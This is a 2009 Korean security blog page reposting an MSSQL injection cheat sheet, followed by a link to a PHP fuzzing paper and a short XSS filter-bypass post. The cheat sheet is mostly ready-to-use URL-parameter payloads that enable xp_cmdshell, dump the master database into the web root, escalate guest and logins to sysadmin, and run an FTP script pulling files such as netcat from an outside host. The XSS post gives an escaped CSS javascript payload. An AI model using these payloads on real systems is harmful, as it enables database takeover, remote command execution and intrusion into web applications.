콩나물 :: 콩나물

어플리케이션/웹보안2009. 3. 9. 17:30

Ms-Sql Injection Privilege Escalation !

1- In mssql , when your Privilege Is USER or Db_Owner You will can Enable XP_DIRTREE And Dir wanted Drive .
viewdetail.aspx?test=22′;exec+master.dbo.sp_addextendedproc+
+0×780070005f006400690072007400720065006500,0×7800700073007400610072002e0064006c006c00–

After Enable , You Can Execute Xp_dirtree and save Result In Database & view It.

2- Enable Execute in Administrator Privilege Without Execute Permission :

Enable XP_EXC:

viewdetail.aspx?test=22′;EXEC+sp_configure+
+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ’show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping 127.0.0.1′ ;

3- Back UP From Database :

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\1.zip’;–

4- GUEST = DB_OWNER :

/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–

5 - ADDIN TO “BUILTIN\ADMINISTRATORS”

FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –

ENABLE OPENROWSET/OLEDB :

FullStory.asp?id=1;select * from openrowset(’sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(’sqloledb’,”;;,”)–

7 - UPLOAD NETCAT or …

/FullStory.asp?id=1;select * from openrowset(’sqloledb’, ’server=UNESCO;uid=BUILTIN\Administrators;pwd=’,’set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)

출 처 : http://abysssec.com/blog

Posted by 김주일

어플리케이션/웹일반2009. 3. 9. 17:07

php-fuzzing-auditing-version-10

내용이 참 알차네~

php-fuzzing-auditing-version-10.pdf

출 처 : http://abysssec.com/blog/wp-content/uploads/2009/03/php-fuzzing-auditing-version-10.pdf

Posted by 김주일

어플리케이션/웹보안2009. 3. 8. 17:49

xss 우회

출 처 : http://duple.tistory.com/187

좀 찾아 봐야 함.
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

Posted by 김주일

«이전 1 ··· 72 73 74 75 76 77 78 ··· 80 다음»

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

콩나물

Ms-Sql Injection Privilege Escalation !

php-fuzzing-auditing-version-10

xss 우회

카테고리

공지사항

태그목록

최근에 올라온 글

최근에 달린 댓글

최근에 받은 트랙백

글 보관함

달력

링크

티스토리툴바